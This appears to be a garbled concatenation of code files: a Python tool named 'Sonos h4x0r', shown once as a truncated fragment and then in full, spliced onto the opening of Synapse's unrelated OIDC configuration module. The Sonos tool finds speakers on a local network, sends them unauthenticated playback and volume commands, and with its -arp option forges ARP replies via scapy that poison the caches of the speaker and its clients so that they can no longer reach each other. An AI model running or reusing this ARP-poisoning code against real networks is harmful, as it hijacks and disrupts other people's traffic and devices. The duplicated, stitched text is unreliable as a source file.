        '<InstanceID>0</InstanceID><Channel>Master</Channel>'
        f'<DesiredVolume>{level}</DesiredVolume>'
        '</u:SetVolume></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:RenderingControl:1#SetVolume",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending volume change request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def playNext(ip):
    """Skip to the next song on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Next xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Next></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Next",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending play next request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def playPrevious(ip):
    """Jump back to the previous song on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Previous xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Previous></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Previous",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending play previous request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def pauseMusic(ip):
    """Pause playback on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Pause xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Pause></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Pause",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending pause request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def playMusic(ip):
    """Start (resume) playback on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Play xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID><Speed>1</Speed></u:Play></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Play",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Performing HTTP request to play music")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def createArpPacket(attackerMac, victimMac, victimIp, ipToSpoof):
    """Forge an ARP frame that poisons the victim's ARP cache.

    The frame, addressed to victimMac/victimIp, claims that ipToSpoof
    is reachable at attackerMac, so the victim's traffic for ipToSpoof
    gets redirected to the attacker.
    """
    return Ether(src=attackerMac) / ARP(
        hwsrc=attackerMac,
        psrc=ipToSpoof,
        hwdst=victimMac,
        pdst=victimIp,
    )
def arpFilterAndPoison(packet):
    """Inspect one sniffed ARP packet and poison interesting requests.

    Two kinds of who-has requests are answered with forged replies:
    - some host resolving the Sonos device's address: that host is
      recorded as a Sonos client and told the Sonos IP lives at our MAC;
    - the Sonos device resolving a known client's address: the device is
      told that the client's IP lives at our MAC.
    Relies on the module-level macSelf, ipSonos and clientList.
    """
    # Ignore packets we sent ourselves.
    if packet[Ether].src == macSelf:
        return
    # Only "who-has" requests (op == 1) are interesting.
    if packet[ARP].op != 1:
        return
    requestedIp = packet[ARP].pdst
    senderIp = packet[ARP].psrc
    if requestedIp == ipSonos and senderIp != ipSonos:
        # Someone asked for the Sonos device's IP. (The second test keeps
        # the device's own gratuitous ARP announcements from registering
        # it as a client of itself.)
        logging.debug(f"IP {requestedIp} asked for Sonos device IP")
        forged = createArpPacket(macSelf, packet[ARP].hwsrc, senderIp, ipSonos)
        # Remember the asker: when the Sonos device later tries to reach
        # it, that communication must be hijacked as well.
        logging.debug(f"Add victimIP '{senderIp}' to client list")
        clientList.append(senderIp)
        # Repeat the reply a few times to make sure we win the race.
        for _ in range(3):
            sendp([forged], loop=0)
    elif requestedIp in clientList and senderIp == ipSonos:
        # The Sonos device asked for a known client's IP.
        logging.debug(f"IP {requestedIp} found in clientlist.")
        forged = createArpPacket(macSelf, packet[ARP].hwsrc, ipSonos, requestedIp)
        # Repeat the reply a few times to make sure we win the race.
        for _ in range(3):
            sendp([forged], loop=0)
# Dispatch on the chosen command.
if arguments.command == "discover":
    logging.debug("Starting discovery")
    devices = discovery()
    logging.info("Address \t\t Server version \t\t\t\t Location\n")
    for dev in devices:
        logging.info(f"{dev.ip} \t\t {dev.serverVersion} \t {dev.descriptionLocation}")
    exit()
elif arguments.command == "control":
    ip = arguments.address
    if arguments.action == "volume":
        # Clamp the requested level into the supported 0-99 range.
        level = min(max(arguments.level, 0), 99)
        logging.debug(f"Changing volume to {level}")
        setVolume(ip, level)
        logging.info(f"Changed volume to {level}")
    else:
        # The remaining actions all share the same debug/call/info shape.
        playbackActions = {
            "next": ("Play next song", playNext, "Playing next song"),
            "previous": ("Play previous song", playPrevious, "Playing previous song"),
            "pause": ("Pause music", pauseMusic, "Paused music"),
            "play": ("Play music", playMusic, "Playing music"),
        }
        entry = playbackActions.get(arguments.action)
        if entry:
            debugMsg, handler, infoMsg = entry
            logging.debug(debugMsg)
            handler(ip)
            logging.info(infoMsg)
# When -arp was given, sniff indefinitely and poison ARP caches so clients
# can no longer talk to the device directly. (Only reachable for the
# 'control' command: 'discover' exits above and has no interface option.)
if arguments.interface:
    logging.info("Performing ARP poisoning from/to sonos device, obstructing clients to communicate with it")
    snif_interface = arguments.interface
    macSelf = get_mac_address(interface=snif_interface)
    ipSonos = arguments.address
    # See arpFilterAndPoison() for what each sniffed ARP packet triggers.
    arpPackets = sniff(count=0, filter="arp", prn=lambda x: arpFilterAndPoison(x))
| import argparse
import logging
import sys
import socket
from typing import ByteString
import select
import time
import re
from urllib import request
import scapy
import getmac
from getmac import get_mac_address
from scapy.all import *
def getArgs():
    """Parse and return the command-line arguments.

    Two commands are supported:
      discover -- scan the local network for Sonos devices;
      control  -- send a playback/volume action to the device at the
                  (required) -ip address, optionally followed by ARP
                  poisoning on the -arp INTERFACE.

    Returns:
        The parsed argparse.Namespace.
    """
    argsParser = argparse.ArgumentParser(
        description="Sonos h4x0r.\nEnables you to mess around " +
        "with sonos devices on the local network.")
    argsParser.add_argument(
        "-v",
        "--verbose",
        required=False,
        action="store_true",
        help="show verbose output (useful for debugging purposes)"
    )
    subparser = argsParser.add_subparsers(
        dest="command",
        title="commands",
        help="(use '{command} -h' to list command-specific arguments)")
    subparser.required = True
    # The 'discover' command takes no further arguments, so the parser
    # object it returns is not needed (the previous local variable that
    # held it was never used).
    subparser.add_parser(
        "discover",
        help="discover sonos devices on the local network")
    # The 'control' command needs an extra subparser for the action the
    # user wants to perform, plus the required 'ip' argument.
    controlParser = subparser.add_parser(
        "control",
        help="control a sonos device on the network")
    controlParser.add_argument_group("required arguments").add_argument(
        "-ip",
        "--address",
        required=True,
        action="store",
        help="the address of the sonos device")
    controlParser.add_argument(
        "-arp",
        "--interface",
        required=False,
        action="store",
        help="after performing the command, perform arp poisoning on specified INTERFACE, obstructing the victim from controlling the device")
    actionParser = controlParser.add_subparsers(dest="action", title="action")
    actionParser.required = True
    actionParser.add_parser("next", help="play next song")
    actionParser.add_parser("previous", help="play previous song")
    actionParser.add_parser("pause", help="pause music")
    actionParser.add_parser("play", help="play music")
    volumeParser = actionParser.add_parser("volume", help="control the volume")
    volumeParser.add_argument_group("required argument").add_argument(
        "level",
        action="store",
        type=int,
        help="the volume level (0 - 99) to set")
    return argsParser.parse_args()
# Parse arguments first; everything below depends on them.
arguments = getArgs()

# IPs of Sonos clients discovered while sniffing. Traffic between the
# Sonos device and these clients gets hijacked - only relevant when the
# user asked for ARP poisoning.
clientList = []

# Plain-message logging to stdout (no timestamps needed); the verbose
# flag selects DEBUG over INFO, and scapy's noisy logger is silenced.
verbose = arguments.verbose
logLevel = logging.DEBUG if verbose else logging.INFO
stdoutHandler = logging.StreamHandler(sys.stdout)
logging.basicConfig(level=logLevel, format="%(message)s", handlers=[stdoutHandler])
logging.getLogger("scapy").setLevel(logging.CRITICAL)
class SonosDevice:
    """A Sonos device discovered on the LAN.

    Attributes:
        ip: the device's IP address.
        serverVersion: the SERVER header the device advertised via SSDP.
        descriptionLocation: URL (from the LOCATION header) where an
            HTTP GET returns additional device information.
    """

    # TODO NIEK: nice to have - fetch that description XML and show some of it.
    def __init__(self, ip, serverVersion, descriptionLocation):
        self.ip = ip
        self.serverVersion = serverVersion
        self.descriptionLocation = descriptionLocation
def filterAndGetSonosDevices(dataAddrTupleList):
    """Filter Sonos devices out of raw SSDP responses.

    Args:
        dataAddrTupleList: list of (data, addr) tuples as returned by
            socket.recvfrom(): data is the raw bytes payload and addr
            is an (ip, port) pair.

    Returns:
        A list of SonosDevice objects, one per response that mentions
        'Sonos' AND carries both LOCATION and SERVER headers.
    """
    result = []
    sonosRegex = re.compile(r"Sonos", re.MULTILINE)
    locationRegex = re.compile(r"^LOCATION: (.*)\r$", re.MULTILINE)
    serverVersionRegex = re.compile(r"^SERVER: (.*)\r$", re.MULTILINE)
    for data, addr in dataAddrTupleList:
        # Decode the raw payload; replace undecodable bytes so one
        # malformed (non-Sonos) response cannot abort the whole scan.
        text = data.decode("utf-8", errors="replace")
        # addr is an (ip, port) tuple; the port is irrelevant here.
        ip = addr[0]
        locMatch = locationRegex.search(text)
        serverVersionMatch = serverVersionRegex.search(text)
        # BUG FIX: this check previously reused locationRegex, so the
        # compiled sonosRegex was dead code and ANY UPnP responder with
        # LOCATION and SERVER headers was reported as a Sonos device.
        if sonosRegex.search(text) and locMatch and serverVersionMatch:
            result.append(
                SonosDevice(ip, serverVersionMatch.group(1), locMatch.group(1)))
        # Otherwise: not a Sonos device (or unsupported response) - skip it.
    return result
def discovery():
    """Discover Sonos devices on the local network via SSDP.

    Sends a pre-formed M-SEARCH datagram to the SSDP multicast address
    and collects UDP responses for about 3 seconds, then filters them
    down to Sonos devices.

    Returns:
        A list of SonosDevice objects found on the network.
    """
    multicast_addr = "239.255.255.250"
    ssdp_port = 1900
    # Hex-encoded SSDP search request. Decoded, it reads:
    # M-SEARCH * HTTP/1.1
    # HOST: 239.255.255.250:1900
    # MAN: "ssdp:discover"
    # MX: 1
    # ST: urn:schemas-upnp-org:device:ZonePlayer:1
    # USER-AGENT: Linux UPnP/1.0 Sonos/63.2-89270 (WDCR:Microsoft Windows
    # NT 10.0.19042)
    # X-SONOS-DEVICEID: 03c8b12a-8339-46da-bd08-f1a2b32d1475
    # X-SONOS-SESSIONSECONDS: 11
    # X-SONOS-MDPMODEL: 3
    svcDiscTrigger = bytes.fromhex("4d2d534541524348202a20485454502f" +
                                   "312e310d0a484f53543a203233392e32" +
                                   "35352e3235352e3235303a313930300d" +
                                   "0a4d414e3a2022737364703a64697363" +
                                   "6f766572220d0a4d583a20310d0a5354" +
                                   "3a2075726e3a736368656d61732d7570" +
                                   "6e702d6f72673a6465766963653a5a6f" +
                                   "6e65506c617965723a310d0a55534552" +
                                   "2d4147454e543a204c696e7578205550" +
                                   "6e502f312e3020536f6e6f732f36332e" +
                                   "322d38393237302028574443523a4d69" +
                                   "63726f736f66742057696e646f777320" +
                                   "4e542031302e302e3139303432290d0a" +
                                   "582d534f4e4f532d4445564943454944" +
                                   "3a2030336338623132612d383333392d" +
                                   "343664612d626430382d663161326233" +
                                   "3264313437350d0a582d534f4e4f532d" +
                                   "53455353494f4e5345434f4e44533a20" +
                                   "31310d0a582d534f4e4f532d4d44504d" +
                                   "4f44454c3a20330d0a0d0a")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # Bind to a random free port, then wait briefly so we are actually
        # listening before the multicast goes out - otherwise the earliest
        # responses could be missed.
        sock.bind(('', 0))
        time.sleep(0.05)
        logging.debug(f"Socket (UDP) listening on {sock.getsockname()}")
        # The return value of sendto (byte count) was previously kept in an
        # unused variable; it is not needed.
        sock.sendto(svcDiscTrigger, (multicast_addr, ssdp_port))
        # Collect responses until 3 seconds have elapsed since the send.
        startTime = time.time()
        responses = []
        while time.time() < startTime + 3:
            # select() times out after 1s so the 3s deadline is re-checked.
            recvReady, _, _ = select.select([sock], [], [], 1)
            for s in recvReady:
                # We have no clue how big the message will be; read max size.
                data, addr = s.recvfrom(65535)
                responses.append((data, addr))
                logging.debug(f"Packet from {str(addr)}:\n {str(data.decode('utf-8'))}\n")
    finally:
        # FIX: always release the socket (it previously leaked), even if
        # select/recv raises.
        sock.close()
    logging.debug(f"Found {str(len(responses))} devices responding to SSDP on network.")
    # Not every multicast responder is a Sonos device; filter the responses.
    devices = filterAndGetSonosDevices(responses)
    logging.debug(f"Found {str(len(devices))} Sonos devices on network.")
    return devices
def setVolume(ip, level):
    """Set the playback volume of the Sonos device at *ip* to *level*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/RenderingControl/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:SetVolume xmlns:u="urn:schemas-upnp-org:service:RenderingControl:1">'
        '<InstanceID>0</InstanceID><Channel>Master</Channel>'
        f'<DesiredVolume>{level}</DesiredVolume>'
        '</u:SetVolume></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:RenderingControl:1#SetVolume",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending volume change request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def playNext(ip):
    """Skip to the next song on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Next xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Next></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Next",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending play next request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def playPrevious(ip):
    """Jump back to the previous song on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Previous xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Previous></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Previous",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending play previous request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def pauseMusic(ip):
    """Pause playback on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Pause xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Pause></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Pause",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Sending pause request")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def playMusic(ip):
    """Start (resume) playback on the Sonos device at *ip*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Play xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID><Speed>1</Speed></u:Play></s:Body></s:Envelope>'
    ).encode("utf-8")
    soapHeaders = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Play",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"',
    }
    logging.debug("Performing HTTP request to play music")
    request.urlopen(request.Request(
        url=endpoint, data=envelope, headers=soapHeaders, method="POST"))
def createArpPacket(attackerMac, victimMac, victimIp, ipToSpoof):
    """Forge an ARP frame that poisons the victim's ARP cache.

    The frame, addressed to victimMac/victimIp, claims that ipToSpoof
    is reachable at attackerMac, so the victim's traffic for ipToSpoof
    gets redirected to the attacker.
    """
    return Ether(src=attackerMac) / ARP(
        hwsrc=attackerMac,
        psrc=ipToSpoof,
        hwdst=victimMac,
        pdst=victimIp,
    )
def arpFilterAndPoison(packet):
    """Inspect one sniffed ARP packet and poison interesting requests.

    Two kinds of who-has requests are answered with forged replies:
    - some host resolving the Sonos device's address: that host is
      recorded as a Sonos client and told the Sonos IP lives at our MAC;
    - the Sonos device resolving a known client's address: the device is
      told that the client's IP lives at our MAC.
    Relies on the module-level macSelf, ipSonos and clientList.
    """
    # Ignore packets we sent ourselves.
    if packet[Ether].src == macSelf:
        return
    # Only "who-has" requests (op == 1) are interesting.
    if packet[ARP].op != 1:
        return
    requestedIp = packet[ARP].pdst
    senderIp = packet[ARP].psrc
    if requestedIp == ipSonos and senderIp != ipSonos:
        # Someone asked for the Sonos device's IP. (The second test keeps
        # the device's own gratuitous ARP announcements from registering
        # it as a client of itself.)
        logging.debug(f"IP {requestedIp} asked for Sonos device IP")
        forged = createArpPacket(macSelf, packet[ARP].hwsrc, senderIp, ipSonos)
        # Remember the asker: when the Sonos device later tries to reach
        # it, that communication must be hijacked as well.
        logging.debug(f"Add victimIP '{senderIp}' to client list")
        clientList.append(senderIp)
        # Repeat the reply a few times to make sure we win the race.
        for _ in range(3):
            sendp([forged], loop=0)
    elif requestedIp in clientList and senderIp == ipSonos:
        # The Sonos device asked for a known client's IP.
        logging.debug(f"IP {requestedIp} found in clientlist.")
        forged = createArpPacket(macSelf, packet[ARP].hwsrc, ipSonos, requestedIp)
        # Repeat the reply a few times to make sure we win the race.
        for _ in range(3):
            sendp([forged], loop=0)
# Dispatch on the chosen command.
if arguments.command == "discover":
    logging.debug("Starting discovery")
    devices = discovery()
    logging.info("Address \t\t Server version \t\t\t\t Location\n")
    for dev in devices:
        logging.info(f"{dev.ip} \t\t {dev.serverVersion} \t {dev.descriptionLocation}")
    exit()
elif arguments.command == "control":
    ip = arguments.address
    if arguments.action == "volume":
        # Clamp the requested level into the supported 0-99 range.
        level = min(max(arguments.level, 0), 99)
        logging.debug(f"Changing volume to {level}")
        setVolume(ip, level)
        logging.info(f"Changed volume to {level}")
    else:
        # The remaining actions all share the same debug/call/info shape.
        playbackActions = {
            "next": ("Play next song", playNext, "Playing next song"),
            "previous": ("Play previous song", playPrevious, "Playing previous song"),
            "pause": ("Pause music", pauseMusic, "Paused music"),
            "play": ("Play music", playMusic, "Playing music"),
        }
        entry = playbackActions.get(arguments.action)
        if entry:
            debugMsg, handler, infoMsg = entry
            logging.debug(debugMsg)
            handler(ip)
            logging.info(infoMsg)
# When -arp was given, sniff indefinitely and poison ARP caches so clients
# can no longer talk to the device directly. (Only reachable for the
# 'control' command: 'discover' exits above and has no interface option.)
if arguments.interface:
    logging.info("Performing ARP poisoning from/to sonos device, obstructing clients to communicate with it")
    snif_interface = arguments.interface
    macSelf = get_mac_address(interface=snif_interface)
    ipSonos = arguments.address
    # See arpFilterAndPoison() for what each sniffed ARP packet triggers.
    arpPackets = sniff(count=0, filter="arp", prn=lambda x: arpFilterAndPoison(x))
|
# Copyright 2020 Quentin Gliech
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import Counter
from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type
import attr
from synapse.config._util import validate_config
from synapse.config.sso import SsoAttributeRequirement
from synapse.types import JsonDict
from synapse.util.module_loader import load_module
from synapse.util.stringutils import parse_and_validate_mxc_uri
from ..util.check_dependencies import DependencyException, check_requirements
from ._base import Config, ConfigError, read_file
# Dotted path of the mapping provider used when the config names none -
# presumably applied in _parse_oidc_provider_configs (defined later in
# this module); confirm there.
DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider"
# The module that JinjaOidcMappingProvider is in was renamed; treat the old
# (pre-rename) dotted path exactly the same as the current one.
LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider"
class OIDCConfig(Config):
    """Parses the `oidc_providers` (and legacy `oidc_config`) settings."""

    section = "oidc"

    def read_config(self, config, **kwargs) -> None:
        """Parse the OIDC provider configs out of ``config``.

        Sets ``self.oidc_providers`` (a tuple of OidcProviderConfig) and, when
        any provider is configured, ``self.oidc_callback_url``.

        Raises:
            ConfigError: if the optional OIDC dependencies are missing, or if
                two providers end up with the same idp_id.
        """
        self.oidc_providers = tuple(_parse_oidc_provider_configs(config))
        if not self.oidc_providers:
            return

        try:
            check_requirements("oidc")
        except DependencyException as e:
            raise ConfigError(
                e.message  # noqa: B306, DependencyException.message is a property
            ) from e

        # check we don't have any duplicate idp_ids now. (The SSO handler will also
        # check for duplicates when the REST listeners get registered, but that happens
        # after synapse has forked so doesn't give nice errors.)
        c = Counter([i.idp_id for i in self.oidc_providers])
        for idp_id, count in c.items():
            if count > 1:
                raise ConfigError(
                    "Multiple OIDC providers have the idp_id %r." % idp_id
                )

        public_baseurl = self.root.server.public_baseurl
        self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback"

    @property
    def oidc_enabled(self) -> bool:
        # OIDC is enabled if we have a provider
        return bool(self.oidc_providers)

    def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str:
        """Return the sample config text for the oidc section.

        NOTE: the sample is passed through `.format()`, hence the quadrupled
        braces in the Jinja2 examples below (they render as doubled braces).
        """
        return """\
# List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration
# and login.
#
# Options for each entry include:
#
# idp_id: a unique identifier for this identity provider. Used internally
# by Synapse; should be a single word such as 'github'.
#
# Note that, if this is changed, users authenticating via that provider
# will no longer be recognised as the same user!
#
# (Use "oidc" here if you are migrating from an old "oidc_config"
# configuration.)
#
# idp_name: A user-facing name for this identity provider, which is used to
# offer the user a choice of login mechanisms.
#
# idp_icon: An optional icon for this identity provider, which is presented
# by clients and Synapse's own IdP picker page. If given, must be an
# MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to
# obtain such an MXC URI is to upload an image to an (unencrypted) room
# and then copy the "url" from the source of the event.)
#
# idp_brand: An optional brand for this identity provider, allowing clients
# to style the login flow according to the identity provider in question.
# See the spec for possible options here.
#
# discover: set to 'false' to disable the use of the OIDC discovery mechanism
# to discover endpoints. Defaults to true.
#
# issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery
# is enabled) to discover the provider's endpoints.
#
# client_id: Required. oauth2 client id to use.
#
# client_secret: oauth2 client secret to use. May be omitted if
# client_secret_jwt_key is given, or if client_auth_method is 'none'.
#
# client_secret_jwt_key: Alternative to client_secret: details of a key used
# to create a JSON Web Token to be used as an OAuth2 client secret. If
# given, must be a dictionary with the following properties:
#
# key: a pem-encoded signing key. Must be a suitable key for the
# algorithm specified. Required unless 'key_file' is given.
#
# key_file: the path to file containing a pem-encoded signing key file.
# Required unless 'key' is given.
#
# jwt_header: a dictionary giving properties to include in the JWT
# header. Must include the key 'alg', giving the algorithm used to
# sign the JWT, such as "ES256", using the JWA identifiers in
# RFC7518.
#
# jwt_payload: an optional dictionary giving properties to include in
# the JWT payload. Normally this should include an 'iss' key.
#
# client_auth_method: auth method to use when exchanging the token. Valid
# values are 'client_secret_basic' (default), 'client_secret_post' and
# 'none'.
#
# scopes: list of scopes to request. This should normally include the "openid"
# scope. Defaults to ["openid"].
#
# authorization_endpoint: the oauth2 authorization endpoint. Required if
# provider discovery is disabled.
#
# token_endpoint: the oauth2 token endpoint. Required if provider discovery is
# disabled.
#
# userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is
# disabled and the 'openid' scope is not requested.
#
# jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and
# the 'openid' scope is used.
#
# skip_verification: set to 'true' to skip metadata verification. Use this if
# you are connecting to a provider that is not OpenID Connect compliant.
# Defaults to false. Avoid this in production.
#
# user_profile_method: Whether to fetch the user profile from the userinfo
# endpoint, or to rely on the data returned in the id_token from the
# token_endpoint.
#
# Valid values are: 'auto' or 'userinfo_endpoint'.
#
# Defaults to 'auto', which uses the userinfo endpoint if 'openid' is
# not included in 'scopes'. Set to 'userinfo_endpoint' to always use the
# userinfo endpoint.
#
# allow_existing_users: set to 'true' to allow a user logging in via OIDC to
# match a pre-existing account instead of failing. This could be used if
# switching from password logins to OIDC. Defaults to false.
#
# user_mapping_provider: Configuration for how attributes returned from a OIDC
# provider are mapped onto a matrix user. This setting has the following
# sub-properties:
#
# module: The class name of a custom mapping module. Default is
# {mapping_provider!r}.
# See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers
# for information on implementing a custom mapping provider.
#
# config: Configuration for the mapping provider module. This section will
# be passed as a Python dictionary to the user mapping provider
# module's `parse_config` method.
#
# For the default provider, the following settings are available:
#
# subject_claim: name of the claim containing a unique identifier
# for the user. Defaults to 'sub', which OpenID Connect
# compliant providers should provide.
#
# localpart_template: Jinja2 template for the localpart of the MXID.
# If this is not set, the user will be prompted to choose their
# own username (see 'sso_auth_account_details.html' in the 'sso'
# section of this file).
#
# display_name_template: Jinja2 template for the display name to set
# on first login. If unset, no displayname will be set.
#
# email_template: Jinja2 template for the email address of the user.
# If unset, no email address will be added to the account.
#
# extra_attributes: a map of Jinja2 templates for extra attributes
# to send back to the client during login.
# Note that these are non-standard and clients will ignore them
# without modifications.
#
# When rendering, the Jinja2 templates are given a 'user' variable,
# which is set to the claims returned by the UserInfo Endpoint and/or
# in the ID Token.
#
# It is possible to configure Synapse to only allow logins if certain attributes
# match particular values in the OIDC userinfo. The requirements can be listed under
# `attribute_requirements` as shown below. All of the listed attributes must
# match for the login to be permitted. Additional attributes can be added to
# userinfo by expanding the `scopes` section of the OIDC config to retrieve
# additional information from the OIDC provider.
#
# If the OIDC claim is a list, then the attribute must match any value in the list.
# Otherwise, it must exactly match the value of the claim. Using the example
# below, the `family_name` claim MUST be "Stephensson", but the `groups`
# claim MUST contain "admin".
#
# attribute_requirements:
# - attribute: family_name
# value: "Stephensson"
# - attribute: groups
# value: "admin"
#
# See https://matrix-org.github.io/synapse/latest/openid.html
# for information on how to configure these options.
#
# For backwards compatibility, it is also possible to configure a single OIDC
# provider via an 'oidc_config' setting. This is now deprecated and admins are
# advised to migrate to the 'oidc_providers' format. (When doing that migration,
# use 'oidc' for the idp_id to ensure that existing users continue to be
# recognised.)
#
oidc_providers:
# Generic example
#
#- idp_id: my_idp
# idp_name: "My OpenID provider"
# idp_icon: "mxc://example.com/mediaid"
# discover: false
# issuer: "https://accounts.example.com/"
# client_id: "provided-by-your-issuer"
# client_secret: "provided-by-your-issuer"
# client_auth_method: client_secret_post
# scopes: ["openid", "profile"]
# authorization_endpoint: "https://accounts.example.com/oauth2/auth"
# token_endpoint: "https://accounts.example.com/oauth2/token"
# userinfo_endpoint: "https://accounts.example.com/userinfo"
# jwks_uri: "https://accounts.example.com/.well-known/jwks.json"
# skip_verification: true
# user_mapping_provider:
# config:
# subject_claim: "id"
# localpart_template: "{{{{ user.login }}}}"
# display_name_template: "{{{{ user.name }}}}"
# email_template: "{{{{ user.email }}}}"
# attribute_requirements:
# - attribute: userGroup
# value: "synapseUsers"
""".format(
            mapping_provider=DEFAULT_USER_MAPPING_PROVIDER
        )
